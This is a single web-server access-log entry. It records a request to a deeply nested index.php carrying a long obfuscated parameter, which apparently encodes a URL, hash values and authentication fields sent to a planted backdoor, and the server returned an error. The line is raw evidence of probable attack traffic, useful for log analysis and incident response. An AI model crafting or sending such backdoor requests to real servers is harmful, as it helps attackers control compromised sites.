51.79.186.0 - - [19/May/2026:15:48:29 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353730392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230323130392q3837316365643236663037383565653261663332356432326630643966396363222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
